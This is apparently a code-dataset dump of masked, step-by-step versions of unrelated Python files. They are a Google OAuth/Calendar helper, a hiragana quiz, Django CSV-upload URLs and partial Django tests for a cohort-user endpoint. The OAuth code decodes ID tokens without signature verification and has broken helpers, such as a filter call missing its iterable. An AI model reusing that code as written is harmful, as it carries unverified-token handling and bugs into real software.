"step-5": "import datetime\nfrom datetime import datetime, timedelta\nimport time\nimport json\nimport base64\nimport requests\nfrom bson.objectid import ObjectId\nimport urllib\nisinpackage = not __name__ in ['google_api', '__main__']\nif isinpackage:\n from .settings import settings\n from . import util\n from .util import Just\n from .db import get_collection\n from .import certificate\nelse:\n from settings import settings\n # import util\n from util import Just\n from db import get_collection\n # import certificate\n\n\nusers_db = get_collection('users')\n\n\nclient_id = settings.google.client_id()\nredirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'\nscope = urllib.parse.quote(settings.google.scope(), safe='')\naccess_type = settings.google.access_type()\nprompt = settings.google.prompt()\nresponse_type = settings.google.response_type()\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, \"google_oauth\", {\"realid\": realid})\n return 'https://accounts.google.com/o/oauth2/v2/auth?' 
\\\n + f\"client_id={client_id}&\" \\\n + f\"include_granted_scopes={'true'}&\" \\\n + f\"redirect_uri={redirect_uri}&\" \\\n + f\"scope={scope}&\" \\\n + f\"access_type={access_type}&\" \\\n + f\"state={state}&\" \\\n + f\"prompt={prompt}&\" \\\n + f\"response_type={response_type}\"\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {\n 'code': code,\n 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri,\n 'grant_type': 'authorization_code'\n }).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\ndef decode_id_token(id_token):\n s = id_token.split('.')\n header = json.loads(decode_base64_padding(s[0]))\n payload = json.loads(decode_base64_padding(s[1]))\n # key = get_certs_keys(header['kid'])\n return header, payload\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid), 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {\n '$set': {\n 'connections.google': profile,\n },\n '$inc': {\n 'connections.length': 0 if user else 1\n }\n })\n print('add google info')\n else:\n users_db.insert_one({\n 'connections': {\n 'google': profile,\n 'length': 1\n }\n })\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {\n 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'refresh_token': refresh_token,\n 'grant_type': 'refresh_token'\n }).json()\n\n\ndef verify_access_token(access_token):\n url = f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}'\n return requests.get(url).status_code == 200\n\n\ndef 
get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({\"connections.google.sub\": user_id})[\"_id\"])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({\"_id\": ObjectId(real_user_id)}))\n if data() and ('line' in data.connections()):\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={\n 'summary': '',\n 'description': ''\n}):\n endpoint = 'https://www.googleapis.com/calendar/v3/calendars/primary/events'\n d = {\n 'end': {\n 'dateTime': end,\n 'timeZone': 'Asia/Tokyo'\n },\n 'start': {\n 'dateTime': start,\n 'timeZone': 'Asia/Tokyo'\n },\n }\n d.update(options)\n res = requests.post(endpoint, json=d, headers={\n 'content-type': 'application/json',\n 'authorization': f'Bearer {get_access_token(get_google_user_id(real_user_id))}'\n })\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
"step-ids": [
11,
12,
14,
15,
16
]
}
|
[
11,
12,
14,
15,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def Fun_hiraganas():
hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',
'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',
'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']
print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -
1)])
print('Hello, type exit if you want to leave')
<|reserved_special_token_0|>
while answer.lower() != 'exit':
Fun_hiraganas()
answer = input('Type exit if you want to leave')
print('bye')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def Fun_hiraganas():
hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',
'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',
'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']
print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -
1)])
print('Hello, type exit if you want to leave')
answer = ''
while answer.lower() != 'exit':
Fun_hiraganas()
answer = input('Type exit if you want to leave')
print('bye')
<|reserved_special_token_1|>
import random


def Fun_hiraganas():
    """Prompt the user (in Spanish) to write one randomly chosen
    romanized hiragana syllable from the a–ho gojuon rows."""
    syllable_pool = [
        'a', 'i', 'u', 'e', 'o',
        'ka', 'ki', 'ku', 'ke', 'ko',
        'sa', 'shi', 'su', 'se', 'so',
        'ta', 'chi', 'tsu', 'te', 'to',
        'na', 'ni', 'nu', 'ne', 'no',
        'ha', 'hi', 'fu', 'he', 'ho',
    ]
    print('escriba el hiragana', random.choice(syllable_pool))


# Interactive drill: keep prompting until the user types 'exit'
# (case-insensitive). The typed answer itself is never graded.
print('Hello, type exit if you want to leave')
reply = ''
while reply.lower() != 'exit':
    Fun_hiraganas()
    reply = input('Type exit if you want to leave')
print('bye')
<|reserved_special_token_1|>
import random


def Fun_hiraganas():
    """Show one randomly selected romanized hiragana for the user to write."""
    hiragana_rows = (
        'a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',
        'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to',
        'na', 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho',
    )
    # randrange(len(...)) picks a valid index uniformly, like randint(0, n-1).
    print("escriba el hiragana", hiragana_rows[random.randrange(len(hiragana_rows))])


# Quiz loop: the function always runs at least once, and the loop ends
# as soon as the user types 'exit' in any capitalization.
print("Hello, type exit if you want to leave")
while True:
    Fun_hiraganas()
    answer = input("Type exit if you want to leave")
    if answer.lower() == 'exit':
        break
print("bye")
|
flexible
|
{
"blob_id": "1fe7d5db1b47ba082301d07d010c6796fbd7edb7",
"index": 6859,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Fun_hiraganas():\n hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',\n 'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',\n 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']\n print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -\n 1)])\n\n\nprint('Hello, type exit if you want to leave')\n<mask token>\nwhile answer.lower() != 'exit':\n Fun_hiraganas()\n answer = input('Type exit if you want to leave')\nprint('bye')\n",
"step-3": "<mask token>\n\n\ndef Fun_hiraganas():\n hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',\n 'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',\n 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']\n print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -\n 1)])\n\n\nprint('Hello, type exit if you want to leave')\nanswer = ''\nwhile answer.lower() != 'exit':\n Fun_hiraganas()\n answer = input('Type exit if you want to leave')\nprint('bye')\n",
"step-4": "import random\n\n\ndef Fun_hiraganas():\n hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',\n 'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',\n 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']\n print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -\n 1)])\n\n\nprint('Hello, type exit if you want to leave')\nanswer = ''\nwhile answer.lower() != 'exit':\n Fun_hiraganas()\n answer = input('Type exit if you want to leave')\nprint('bye')\n",
"step-5": "import random\n\ndef Fun_hiraganas():\n\thiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko', 'sa', 'shi', 'su', 'se', \n\t'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na', 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']\n\tprint(\"escriba el hiragana\", hiraganas[random.randint(0, len(hiraganas)-1)])\n\nprint(\"Hello, type exit if you want to leave\")\nanswer = \"\"\nwhile answer.lower() != 'exit':\n\tFun_hiraganas() \n\tanswer = input(\"Type exit if you want to leave\")\nprint(\"bye\")\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from django.conf.urls import url
from ..views import (buildings_upload, keytype_upload, key_upload, keystatus_upload, keyissue_upload)
from django.contrib.auth.decorators import login_required

# Every route follows the same shape: ``^<prefix>_csv/$`` dispatches to the
# matching CSV-upload view and is reversible as ``<prefix>_upload``.
# NOTE(review): login_required is imported but not applied to any route here.
_CSV_UPLOAD_ROUTES = (
    ('buildings', buildings_upload),
    ('keytype', keytype_upload),
    ('key', key_upload),
    ('keystatus', keystatus_upload),
    ('keyissue', keyissue_upload),
)

urlpatterns = [
    url(r'^%s_csv/$' % prefix, view, name='%s_upload' % prefix)  # NOQA
    for prefix, view in _CSV_UPLOAD_ROUTES
]
|
normal
|
{
"blob_id": "4a0d8e6b6205fa57b8614857e1462203a2a7d2c5",
"index": 3002,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^buildings_csv/$', buildings_upload, name=\n 'buildings_upload'), url('^keytype_csv/$', keytype_upload, name=\n 'keytype_upload'), url('^key_csv/$', key_upload, name='key_upload'),\n url('^keystatus_csv/$', keystatus_upload, name='keystatus_upload'), url\n ('^keyissue_csv/$', keyissue_upload, name='keyissue_upload')]\n",
"step-3": "from django.conf.urls import url\nfrom ..views import buildings_upload, keytype_upload, key_upload, keystatus_upload, keyissue_upload\nfrom django.contrib.auth.decorators import login_required\nurlpatterns = [url('^buildings_csv/$', buildings_upload, name=\n 'buildings_upload'), url('^keytype_csv/$', keytype_upload, name=\n 'keytype_upload'), url('^key_csv/$', key_upload, name='key_upload'),\n url('^keystatus_csv/$', keystatus_upload, name='keystatus_upload'), url\n ('^keyissue_csv/$', keyissue_upload, name='keyissue_upload')]\n",
"step-4": "from django.conf.urls import url\nfrom ..views import (buildings_upload, keytype_upload, key_upload, keystatus_upload, keyissue_upload)\nfrom django.contrib.auth.decorators import login_required\n\nurlpatterns = [\n url(r'^buildings_csv/$', # NOQA\n buildings_upload,\n name=\"buildings_upload\"),\n url(r'^keytype_csv/$', # NOQA\n keytype_upload,\n name=\"keytype_upload\"),\n url(r'^key_csv/$', # NOQA\n key_upload,\n name=\"key_upload\"),\n url(r'^keystatus_csv/$', # NOQA\n keystatus_upload,\n name=\"keystatus_upload\"),\n url(r'^keyissue_csv/$', # NOQA\n keyissue_upload,\n name=\"keyissue_upload\"),\n]\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class CohortIdUserIdTestSuite(AdmissionsTestCase):
<|reserved_special_token_0|>
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_without_auth(self):
"""Test /cohort/:id/user/:id without auth"""
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
response = self.client.get(url)
json = response.json()
self.assertEqual(json, {'detail':
'Authentication credentials were not provided.', 'status_code':
status.HTTP_401_UNAUTHORIZED})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_without_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_with_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
model_dict = self.get_cohort_user_dict(1)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.put(url, data)
json = response.json()
expected = {'id': model.cohort_user.id, 'role': model.cohort_user.
role, 'educational_status': model.cohort_user.
educational_status, 'finantial_status': model.cohort_user.
finantial_status}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.count_cohort_user(), 1)
self.assertEqual(self.get_cohort_user_dict(1), model_dict)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.count_cohort_user(), 0)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_task(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True, task=True,
task_status='PENDING', task_type='PROJECT')
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'User has tasks with status pending the educational status cannot be GRADUATED'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Cannot be marked as `GRADUATED` if its financial status is `LATE`'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CohortIdUserIdTestSuite(AdmissionsTestCase):
<|reserved_special_token_0|>
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_without_auth(self):
"""Test /cohort/:id/user/:id without auth"""
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
response = self.client.get(url)
json = response.json()
self.assertEqual(json, {'detail':
'Authentication credentials were not provided.', 'status_code':
status.HTTP_401_UNAUTHORIZED})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': 999})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid user_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_without_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_with_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
model_dict = self.get_cohort_user_dict(1)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.put(url, data)
json = response.json()
expected = {'id': model.cohort_user.id, 'role': model.cohort_user.
role, 'educational_status': model.cohort_user.
educational_status, 'finantial_status': model.cohort_user.
finantial_status}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.count_cohort_user(), 1)
self.assertEqual(self.get_cohort_user_dict(1), model_dict)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': 9999})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 9999, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.count_cohort_user(), 0)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_task(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True, task=True,
task_status='PENDING', task_type='PROJECT')
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'User has tasks with status pending the educational status cannot be GRADUATED'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Cannot be marked as `GRADUATED` if its financial status is `LATE`'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CohortIdUserIdTestSuite(AdmissionsTestCase):
    """Tests for the admissions /cohort/:id/user/:id endpoint (GET, PUT, DELETE).

    Every test patches the Google Cloud Storage client, bucket and blob with
    mocks so no real network calls are made during the request cycle.
    """
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_without_auth(self):
        """GET without auth credentials responds 401 with a 'not provided' detail."""
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': 1, 'user_id': 1})
        response = self.client.get(url)
        json = response.json()
        self.assertEqual(json, {'detail':
            'Authentication credentials were not provided.', 'status_code':
            status.HTTP_401_UNAUTHORIZED})
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_cohort_id(self):
        """PUT against a cohort id that matches no cohort responds 400 'invalid cohort_id'."""
        model = self.generate_models(authenticate=True)
        url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
            'cohort_id': 1, 'user_id': 1})
        data = {}
        response = self.client.put(url, data)
        json = response.json()
        expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
        self.assertEqual(json, expected)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
    @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
    @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
    @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
    def test_cohort_id_user_id_put_with_bad_user_id(self):
        """PUT against a user id that matches no user responds 400 'invalid user_id'."""
